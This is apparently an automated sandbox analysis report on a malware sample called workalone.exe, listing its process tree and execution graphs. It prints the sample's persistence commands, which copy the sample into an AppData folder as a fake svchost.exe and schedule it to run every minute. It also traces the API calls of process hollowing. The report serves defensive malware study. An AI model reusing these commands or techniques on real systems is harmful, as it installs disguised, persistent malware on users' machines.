                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high

                                                          Target ID:3
                                                          Start time:00:07:06
                                                          Start date:30/11/2022
                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:cmd" /c mkdir "C:\Users\user\AppData\Roaming\svchost
                                                          Imagebase:0xb0000
                                                          File size:232960 bytes
                                                          MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high

                                                          Target ID:4
                                                          Start time:00:07:07
                                                          Start date:30/11/2022
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff745070000
                                                          File size:625664 bytes
                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high

                                                          Target ID:5
                                                          Start time:00:07:07
                                                          Start date:30/11/2022
                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"cmd" /c schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\svchost\svchost.exe'" /f
                                                          Imagebase:0xb0000
                                                          File size:232960 bytes
                                                          MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high

                                                          Target ID:6
                                                          Start time:00:07:07
                                                          Start date:30/11/2022
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff745070000
                                                          File size:625664 bytes
                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high

                                                          Target ID:7
                                                          Start time:00:07:07
                                                          Start date:30/11/2022
                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:cmd" /c copy "C:\Users\user\Desktop\workalone.exe" "C:\Users\user\AppData\Roaming\svchost\svchost.exe
                                                          Imagebase:0xb0000
                                                          File size:232960 bytes
                                                          MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high

                                                          Target ID:8
                                                          Start time:00:07:07
                                                          Start date:30/11/2022
                                                          Path:C:\Windows\SysWOW64\schtasks.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\svchost\svchost.exe'" /f
                                                          Imagebase:0x960000
                                                          File size:185856 bytes
                                                          MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language

                                                          Target ID:9
                                                          Start time:00:07:08
                                                          Start date:30/11/2022
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff745070000
                                                          File size:625664 bytes
                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language

                                                          Reset < >

                                                            Execution Graph

                                                            Execution Coverage:18.7%
                                                            Dynamic/Decrypted Code Coverage:100%
                                                            Signature Coverage:6.7%
                                                            Total number of Nodes:45
                                                            Total number of Limit Nodes:2
                                                            execution_graph 5175 f80448 5176 f80456 5175->5176 5177 f8046a 5176->5177 5179 f8269d 5176->5179 5183 f862d8 5179->5183 5187 f862c8 5179->5187 5180 f826a8 5180->5180 5184 f862e4 5183->5184 5185 f862f5 5184->5185 5191 f87b58 5184->5191 5185->5180 5188 f862e4 5187->5188 5189 f862f5 5188->5189 5190 f87b58 12 API calls 5188->5190 5189->5180 5190->5188 5192 f87b96 5191->5192 5220 f88220 5192->5220 5224 f88214 5192->5224 5193 f87f83 5194 f87fc3 5193->5194 5204 f88658 SetThreadContext 5193->5204 5205 f88650 SetThreadContext 5193->5205 5201 f87fe0 5194->5201 5214 f88658 SetThreadContext 5194->5214 5215 f88650 SetThreadContext 5194->5215 5195 f87c7f 5195->5193 5218 f88718 ReadProcessMemory 5195->5218 5219 f88711 ReadProcessMemory 5195->5219 5196 f88008 5196->5184 5197 f87d61 5202 f88808 VirtualAllocEx 5197->5202 5203 f88800 VirtualAllocEx 5197->5203 5198 f87de1 5198->5193 5210 f888a9 WriteProcessMemory 5198->5210 5211 f888b0 WriteProcessMemory 5198->5211 5199 f87e4c 5200 f87f42 5199->5200 5206 f888a9 WriteProcessMemory 5199->5206 5207 f888b0 WriteProcessMemory 5199->5207 5208 f888a9 WriteProcessMemory 5200->5208 5209 f888b0 WriteProcessMemory 5200->5209 5216 f889e8 ResumeThread 5201->5216 5217 f889e1 ResumeThread 5201->5217 5202->5198 5203->5198 5204->5194 5205->5194 5206->5199 5207->5199 5208->5193 5209->5193 5210->5199 5211->5199 5214->5201 5215->5201 5216->5196 5217->5196 5218->5197 5219->5197 5222 f882ad CreateProcessAsUserA 5220->5222 5223 f884c8 5222->5223 5223->5223 5226 f882ad CreateProcessAsUserA 5224->5226 5227 f884c8 5226->5227 5227->5227

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 57 f88220-f882b9 59 f882bb-f882e0 57->59 60 f8830d-f8832f 57->60 59->60 65 f882e2-f882e4 59->65 63 f88331-f88359 60->63 64 f88386-f883b6 60->64 63->64 72 f8835b-f8835d 63->72 74 f883b8-f883dd 64->74 75 f8840a-f884c6 CreateProcessAsUserA 64->75 66 f882e6-f882f0 65->66 67 f88307-f8830a 65->67 69 f882f2 66->69 70 f882f4-f88303 66->70 67->60 69->70 70->70 73 f88305 70->73 76 f8835f-f88369 72->76 77 f88380-f88383 72->77 73->67 74->75 83 f883df-f883e1 74->83 89 f884c8-f884ce 75->89 90 f884cf-f88543 75->90 78 f8836b 76->78 79 f8836d-f8837c 76->79 77->64 78->79 79->79 82 f8837e 79->82 82->77 84 f883e3-f883ed 83->84 85 f88404-f88407 83->85 87 f883ef 84->87 88 f883f1-f88400 84->88 85->75 87->88 88->88 91 f88402 88->91 89->90 99 f88553-f88557 90->99 100 f88545-f88549 90->100 91->85 102 f88559-f8855d 99->102 103 f88567-f8856b 99->103 100->99 101 f8854b 100->101 101->99 102->103 106 f8855f 102->106 104 f8857b-f8857f 103->104 105 f8856d-f88571 103->105 108 f88591-f88598 104->108 109 f88581-f88587 104->109 105->104 107 f88573 105->107 106->103 107->104 110 f8859a-f885a9 108->110 111 f885af 108->111 109->108 110->111 113 f885b0 111->113 113->113
                                                            APIs
                                                            • CreateProcessAsUserA.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00F884B3
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.266526408.0000000000F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F80000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f80000_workalone.jbxd
                                                            Similarity
                                                            • API ID: CreateProcessUser
                                                            • String ID:
                                                            • API String ID: 2217836671-0
                                                            • Opcode ID: 86380a7dd947499029bd0bad9b42f2d745cfa061b38e81d3fde7951272b57874
                                                            • Instruction ID: 20df7b84cbe0a18c0f55a7b32f24153d060e20cbba6542180d0586040e1656e8
                                                            • Opcode Fuzzy Hash: 86380a7dd947499029bd0bad9b42f2d745cfa061b38e81d3fde7951272b57874
                                                            • Instruction Fuzzy Hash: 40A14771E002198FDB10DFA8C8817DEBBF2FF48314F448169E819A7291DB749986DF91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 0 f88214-f882b9 2 f882bb-f882e0 0->2 3 f8830d-f8832f 0->3 2->3 8 f882e2-f882e4 2->8 6 f88331-f88359 3->6 7 f88386-f883b6 3->7 6->7 15 f8835b-f8835d 6->15 17 f883b8-f883dd 7->17 18 f8840a-f884c6 CreateProcessAsUserA 7->18 9 f882e6-f882f0 8->9 10 f88307-f8830a 8->10 12 f882f2 9->12 13 f882f4-f88303 9->13 10->3 12->13 13->13 16 f88305 13->16 19 f8835f-f88369 15->19 20 f88380-f88383 15->20 16->10 17->18 26 f883df-f883e1 17->26 32 f884c8-f884ce 18->32 33 f884cf-f88543 18->33 21 f8836b 19->21 22 f8836d-f8837c 19->22 20->7 21->22 22->22 25 f8837e 22->25 25->20 27 f883e3-f883ed 26->27 28 f88404-f88407 26->28 30 f883ef 27->30 31 f883f1-f88400 27->31 28->18 30->31 31->31 34 f88402 31->34 32->33 42 f88553-f88557 33->42 43 f88545-f88549 33->43 34->28 45 f88559-f8855d 42->45 46 f88567-f8856b 42->46 43->42 44 f8854b 43->44 44->42 45->46 49 f8855f 45->49 47 f8857b-f8857f 46->47 48 f8856d-f88571 46->48 51 f88591-f88598 47->51 52 f88581-f88587 47->52 48->47 50 f88573 48->50 49->46 50->47 53 f8859a-f885a9 51->53 54 f885af 51->54 52->51 53->54 56 f885b0 54->56 56->56
                                                            APIs
                                                            • CreateProcessAsUserA.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00F884B3
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.266526408.0000000000F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F80000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f80000_workalone.jbxd
                                                            Similarity
                                                            • API ID: CreateProcessUser
                                                            • String ID:
                                                            • API String ID: 2217836671-0
                                                            • Opcode ID: f69424b480554f2cfb4db88ef243b3bf6e4c49d515437ddf984b3c438978b0a5
                                                            • Instruction ID: becd111fe4942da64b7337de5c04bba65ba8477643c76bcabed1394e048a6b8c
                                                            • Opcode Fuzzy Hash: f69424b480554f2cfb4db88ef243b3bf6e4c49d515437ddf984b3c438978b0a5
                                                            • Instruction Fuzzy Hash: 8AA15771E002198FDB10DFA8C8817EEBBB2FF48314F448169E819A7291DB759986DF91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 114 f888a9-f88901 116 f88911-f8894a WriteProcessMemory 114->116 117 f88903-f8890f 114->117 118 f8894c-f88952 116->118 119 f88953-f88974 116->119 117->116 118->119
                                                            APIs
                                                            • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 00F8893D
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.266526408.0000000000F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F80000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f80000_workalone.jbxd
                                                            Similarity
                                                            • API ID: MemoryProcessWrite
                                                            • String ID:
                                                            • API String ID: 3559483778-0
                                                            • Opcode ID: b8540f345198613d1d0bce680e1be8987b89bf2c0e355acddf55a84fb45cb3e1
                                                            • Instruction ID: 18840c998a1014631c774b75651fbf2815e9e569c265ee276b213849b49f6606
                                                            • Opcode Fuzzy Hash: b8540f345198613d1d0bce680e1be8987b89bf2c0e355acddf55a84fb45cb3e1
                                                            • Instruction Fuzzy Hash: 372125B19002499FCB10CFA9C885BEEBBF4FF48320F408429E858A7240D778A945CFA5
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 121 f888b0-f88901 123 f88911-f8894a WriteProcessMemory 121->123 124 f88903-f8890f 121->124 125 f8894c-f88952 123->125 126 f88953-f88974 123->126 124->123 125->126
                                                            APIs
                                                            • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 00F8893D
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.266526408.0000000000F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F80000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f80000_workalone.jbxd
                                                            Similarity
                                                            • API ID: MemoryProcessWrite
                                                            • String ID:
                                                            • API String ID: 3559483778-0
                                                            • Opcode ID: 159208b4d496cb5d2ec1fb3f99dc8d99bf2c1cdea080fd0aa82883245cc8c4a3
                                                            • Instruction ID: 65a9192169e1e7f74eccf04b5ec4232dc0335a1b99eb257fe35cbff2cd2ecdd3
                                                            • Opcode Fuzzy Hash: 159208b4d496cb5d2ec1fb3f99dc8d99bf2c1cdea080fd0aa82883245cc8c4a3
                                                            • Instruction Fuzzy Hash: 4E2114B19002499FCB10CF9AC885BDEBBF4FB48320F40842AE918A7240D778A940CBA5
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 128 f88650-f886a4 130 f886b0-f886dc SetThreadContext 128->130 131 f886a6-f886ae 128->131 132 f886de-f886e4 130->132 133 f886e5-f88706 130->133 131->130 132->133
                                                            APIs
                                                            • SetThreadContext.KERNELBASE(?,00000000), ref: 00F886CF
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.266526408.0000000000F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F80000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f80000_workalone.jbxd
                                                            Similarity
                                                            • API ID: ContextThread
                                                            • String ID:
                                                            • API String ID: 1591575202-0
                                                            • Opcode ID: ead4e0d5aa08bced5199fcf0452b80c46fd5d9422f9aa3b9f0ec01550d2b4f30
                                                            • Instruction ID: 03b4626c3cd5ece0862f0f83d129d369bdb7d56e07974347452cd3cb2e4c5d15
                                                            • Opcode Fuzzy Hash: ead4e0d5aa08bced5199fcf0452b80c46fd5d9422f9aa3b9f0ec01550d2b4f30
                                                            • Instruction Fuzzy Hash: 672124B1D012599FCB10CFAAC485BEEFBF4BB48324F54816AD418B7240E778A945CFA1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 135 f88658-f886a4 137 f886b0-f886dc SetThreadContext 135->137 138 f886a6-f886ae 135->138 139 f886de-f886e4 137->139 140 f886e5-f88706 137->140 138->137 139->140
                                                            APIs
                                                            • SetThreadContext.KERNELBASE(?,00000000), ref: 00F886CF
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.266526408.0000000000F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F80000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f80000_workalone.jbxd
                                                            Similarity
                                                            • API ID: ContextThread
                                                            • String ID:
                                                            • API String ID: 1591575202-0
                                                            • Opcode ID: 5fd5a1033351f35c873593cf966f213c65d5fcc6b562dedf639f003a286b9db2
                                                            • Instruction ID: 71125db76713d31cdb334cda3fdc03e01fc4919b4ae063bbe64751963dac7ff6
                                                            • Opcode Fuzzy Hash: 5fd5a1033351f35c873593cf966f213c65d5fcc6b562dedf639f003a286b9db2
                                                            • Instruction Fuzzy Hash: 852106B1D006199FCB10DF9AC485BDEFBF4BB48724F54812AD418A7240E778A9458FA5
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 142 f88711-f8879b ReadProcessMemory 144 f8879d-f887a3 142->144 145 f887a4-f887c5 142->145 144->145
                                                            APIs
                                                            • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00F8878E
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.266526408.0000000000F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F80000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f80000_workalone.jbxd
                                                            Similarity
                                                            • API ID: MemoryProcessRead
                                                            • String ID:
                                                            • API String ID: 1726664587-0
                                                            • Opcode ID: 9db516188a2032baf135ce9d5cb70a3c2c7599e3d51a7184163572761121a567
                                                            • Instruction ID: bb6120d96fde52f8b770d682e8d4942a2cd11074bd05c28ce06594645b647af9
                                                            • Opcode Fuzzy Hash: 9db516188a2032baf135ce9d5cb70a3c2c7599e3d51a7184163572761121a567
                                                            • Instruction Fuzzy Hash: 7C2113B19002499FCB10CF9AC884BDEBBF4FF48320F148429E558A7210D378A945CFA1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 147 f88718-f8879b ReadProcessMemory 149 f8879d-f887a3 147->149 150 f887a4-f887c5 147->150 149->150
                                                            APIs
                                                            • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00F8878E
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.266526408.0000000000F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F80000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f80000_workalone.jbxd
                                                            Similarity
                                                            • API ID: MemoryProcessRead
                                                            • String ID:
                                                            • API String ID: 1726664587-0
                                                            • Opcode ID: 9980d842f71fed0557bc92f9b92c0df1ea1af028a8ecbb954c8f5266f2fcebef
                                                            • Instruction ID: c356bc274bdbd729ffb7318a295a57673b996e85f457bced5e2ee3d6dc055405
                                                            • Opcode Fuzzy Hash: 9980d842f71fed0557bc92f9b92c0df1ea1af028a8ecbb954c8f5266f2fcebef
                                                            • Instruction Fuzzy Hash: B02103B59002499FCB10CF9AC884BDEFBF4FB48320F148429E918A7250D778AA45CFA1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 152 f88800-f88880 VirtualAllocEx 154 f88889-f8889d 152->154 155 f88882-f88888 152->155 155->154
                                                            APIs
                                                            • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 00F88873
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.266526408.0000000000F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F80000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f80000_workalone.jbxd
                                                            Similarity
                                                            • API ID: AllocVirtual
                                                            • String ID:
                                                            • API String ID: 4275171209-0
                                                            • Opcode ID: 8ffa882cd2b3e392ed56a6bb851a4c7512ce7493c452719c2634ceca9bfad2c6
                                                            • Instruction ID: 8890e0096675bdbdc5911e005e456c803f4cc1f382f7391a24762155a7d012c5
                                                            • Opcode Fuzzy Hash: 8ffa882cd2b3e392ed56a6bb851a4c7512ce7493c452719c2634ceca9bfad2c6
                                                            • Instruction Fuzzy Hash: 681134B58002499FCB20DF9AC884BDEBFF4FB88320F148419E518A7210C775A951CFA0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 157 f88808-f88880 VirtualAllocEx 159 f88889-f8889d 157->159 160 f88882-f88888 157->160 160->159
                                                            APIs
                                                            • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 00F88873
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.266526408.0000000000F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F80000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f80000_workalone.jbxd
                                                            Similarity
                                                            • API ID: AllocVirtual
                                                            • String ID:
                                                            • API String ID: 4275171209-0
                                                            • Opcode ID: 49a912b59ac6465884f9b916fb710e6c37785dd662dfe9d05d5ff24dd1ff335d
                                                            • Instruction ID: 6ce2c0172c9c8563ff35d380bc283a227dc592dab6606851cab7b9d388fc32bf
                                                            • Opcode Fuzzy Hash: 49a912b59ac6465884f9b916fb710e6c37785dd662dfe9d05d5ff24dd1ff335d
                                                            • Instruction Fuzzy Hash: 6011F2B5900249DFCB20DF9AD884BDEBBF4FB48324F148419E529A7210D775A944CFA5
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 162 f889e1-f88a54 ResumeThread 164 f88a5d-f88a71 162->164 165 f88a56-f88a5c 162->165 165->164
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.266526408.0000000000F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F80000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f80000_workalone.jbxd
                                                            Similarity
                                                            • API ID: ResumeThread
                                                            • String ID:
                                                            • API String ID: 947044025-0
                                                            • Opcode ID: dc1ffaae22e9bc8bcc7f203892ea0aa9c9ab831806080f45eefa33f89a77609f
                                                            • Instruction ID: db4712e046732c340f467a1f838d274a8084bf9719ca26e1b3e9522ac2fc0c90
                                                            • Opcode Fuzzy Hash: dc1ffaae22e9bc8bcc7f203892ea0aa9c9ab831806080f45eefa33f89a77609f
                                                            • Instruction Fuzzy Hash: E31130B0C002498FCB20DF9AD488BDEFBF4FB48324F14886AD418A7240C778A945CFA4
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 167 f889e8-f88a54 ResumeThread 169 f88a5d-f88a71 167->169 170 f88a56-f88a5c 167->170 170->169
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.266526408.0000000000F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F80000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f80000_workalone.jbxd
                                                            Similarity
                                                            • API ID: ResumeThread
                                                            • String ID:
                                                            • API String ID: 947044025-0
                                                            • Opcode ID: aceca4d630a4e5a2d50677220e83d0de6e761c51c37921456e80e490b9032d50
                                                            • Instruction ID: e5bb7c85c2ae10e39a66b909465c533515749fde7bc4b6089cd3a911a481d04a
                                                            • Opcode Fuzzy Hash: aceca4d630a4e5a2d50677220e83d0de6e761c51c37921456e80e490b9032d50
                                                            • Instruction Fuzzy Hash: 2B1112B18002498FCB20DF9AD484BDEFBF4FB49324F14841AD518A7240C778A944CFA5
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.266436428.0000000000D9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D9D000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d9d000_workalone.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 7493f4f83d2253d8f4a3912d099d07f3bacc757703c4b5ca3bc04e8adfec77ad
                                                            • Instruction ID: e62713c7d398024bc2dcffb2963997200943a3654b2a7eeb10c553ae98b4075c
                                                            • Opcode Fuzzy Hash: 7493f4f83d2253d8f4a3912d099d07f3bacc757703c4b5ca3bc04e8adfec77ad
                                                            • Instruction Fuzzy Hash: D82149B2504248DFCF05CF10D9C0F26BF66FB98328F2485A9E9494B206C336D856DBB1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.266436428.0000000000D9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D9D000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d9d000_workalone.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c28d7f9b6c052c6bf27c54b29b78abe899c0e928c1954ef857855ef63c427eb8
                                                            • Instruction ID: a13db939db14dc44c15809d12a83e12d7180ba99de3c8921486eba87c7b7498b
                                                            • Opcode Fuzzy Hash: c28d7f9b6c052c6bf27c54b29b78abe899c0e928c1954ef857855ef63c427eb8
                                                            • Instruction Fuzzy Hash: A2110876404284CFCF11CF10D5C4B16BF72FB94324F28C6A9D8490B616C336D856CBA1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Execution Graph

                                                            Execution Coverage:16%
                                                            Dynamic/Decrypted Code Coverage:100%
                                                            Signature Coverage:7.1%
                                                            Total number of Nodes:56
                                                            Total number of Limit Nodes:0
                                                            execution_graph 16841 65ebde8 16842 65ebe4e 16841->16842 16845 65ebfa8 16842->16845 16848 65eb464 16845->16848 16849 65ec010 DuplicateHandle 16848->16849 16850 65ebefd 16849->16850 16851 54d0471 16855 54d04c8 16851->16855 16860 54d04d8 16851->16860 16852 54d0489 16856 54d04fa 16855->16856 16865 54d08e8 16856->16865 16869 54d08e0 16856->16869 16857 54d053e 16857->16852 16861 54d04fa 16860->16861 16863 54d08e8 GetConsoleWindow 16861->16863 16864 54d08e0 GetConsoleWindow 16861->16864 16862 54d053e 16862->16852 16863->16862 16864->16862 16866 54d0926 GetConsoleWindow 16865->16866 16868 54d0956 16866->16868 16868->16857 16870 54d0926 GetConsoleWindow 16869->16870 16872 54d0956 16870->16872 16872->16857 16799 65e3370 16800 65e3393 16799->16800 16804 65e452a 16800->16804 16808 65e4530 16800->16808 16801 65e344d 16806 65e452e 16804->16806 16807 65e4581 16806->16807 16812 65e40b8 16806->16812 16807->16801 16809 65e4578 16808->16809 16810 65e4581 16809->16810 16811 65e40b8 LoadLibraryW 16809->16811 16810->16801 16811->16810 16813 65e4720 LoadLibraryW 16812->16813 16815 65e4795 16813->16815 16815->16807 16816 65e97f0 16818 65e97fc 16816->16818 16817 65e9849 16821 65ec6cf 16818->16821 16827 65ec711 16818->16827 16822 65ec6fb 16821->16822 16833 65ec78a 16822->16833 16837 65ec798 16822->16837 16823 65ec72e KiUserExceptionDispatcher 16824 65ec746 16823->16824 16824->16817 16828 65ec71c 16827->16828 16831 65ec78a LdrInitializeThunk 16828->16831 16832 65ec798 LdrInitializeThunk 16828->16832 16829 65ec72e KiUserExceptionDispatcher 16830 65ec746 16829->16830 16830->16817 16831->16829 16832->16829 16834 65ec7be 16833->16834 16835 65ec7c6 LdrInitializeThunk 16834->16835 16836 65ec7c2 16834->16836 16835->16836 16836->16823 16838 65ec7be 16837->16838 16839 65ec7c6 LdrInitializeThunk 16838->16839 16840 65ec7c2 16838->16840 16839->16840 16840->16823

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 29 65e8440-65e846e 30 65e847a-65e847f 29->30 31 65e8470-65e8478 29->31 32 65e8484-65e8489 30->32 31->32 33 65e848f 32->33 34 65e848b-65e848d 32->34 35 65e8492-65e8494 33->35 34->35 36 65e849a-65e84a4 35->36 37 65e8534-65e853a 35->37 40 65e84a6-65e84b2 36->40 41 65e84b4-65e84c3 36->41 38 65e853c 37->38 39 65e8546-65e8553 37->39 38->39 46 65e8820-65e8827 39->46 42 65e84c6-65e84d2 40->42 41->42 44 65e84d8 42->44 45 65e84d4-65e84d6 42->45 47 65e84db-65e84dd 44->47 45->47 47->37 48 65e84df-65e84e9 47->48 49 65e84eb-65e84f7 48->49 50 65e84f9-65e8517 48->50 51 65e851b-65e8527 49->51 50->51 52 65e852d 51->52 53 65e8529-65e852b 51->53 54 65e8530-65e8532 52->54 53->54 54->37 55 65e8558-65e8562 54->55 56 65e8564-65e8570 55->56 57 65e8572-65e8590 55->57 58 65e8594-65e85a0 56->58 57->58 59 65e85a6 58->59 60 65e85a2-65e85a4 58->60 61 65e85a9-65e85ab 59->61 60->61 62 65e85ad-65e85bb 61->62 63 65e85c0-65e85ca 61->63 62->46 64 65e85cc-65e85d8 63->64 65 65e85da-65e85f8 63->65 67 65e85fc-65e8608 64->67 65->67 68 65e860e 67->68 69 65e860a-65e860c 67->69 70 65e8611-65e8613 68->70 69->70 71 65e8628-65e8632 70->71 72 65e8615-65e8623 70->72 73 65e8634-65e8640 71->73 74 65e8642-65e8660 71->74 72->46 76 65e8664-65e8670 73->76 74->76 77 65e8676 76->77 78 65e8672-65e8674 76->78 79 65e8679-65e867b 77->79 78->79 80 65e867d-65e868b 79->80 81 65e8690-65e869a 79->81 80->46 82 65e869c-65e86a8 81->82 83 65e86aa-65e86c8 81->83 85 65e86cc-65e86d8 82->85 83->85 86 65e86de 85->86 87 65e86da-65e86dc 85->87 88 65e86e1-65e86e3 86->88 87->88 89 65e86f8-65e8702 88->89 90 65e86e5-65e86f3 88->90 91 65e8704-65e8710 89->91 92 65e8712-65e8730 89->92 90->46 94 65e8734-65e8740 91->94 92->94 95 65e8746 94->95 96 65e8742-65e8744 94->96 97 65e8749-65e874b 95->97 96->97 98 65e874d-65e875b 97->98 99 65e8760-65e876a 97->99 98->46 100 65e876c-65e877b 99->100 101 65e877d-65e879e 99->101 102 65e87a2-65e87b1 100->102 101->102 104 65e87b7 102->104 105 65e87b3-65e87b5 102->105 106 65e87ba-65e87bc 104->106 105->106 107 65e87be-65e87d5 106->107 108 65e882a-65e8877 106->108 109 65e87ee 107->109 110 65e87d7-65e87ec 107->110 112 65e87f0-65e8819 109->112 110->112 112->46
                                                            Strings
                                                            Memory Dump Source
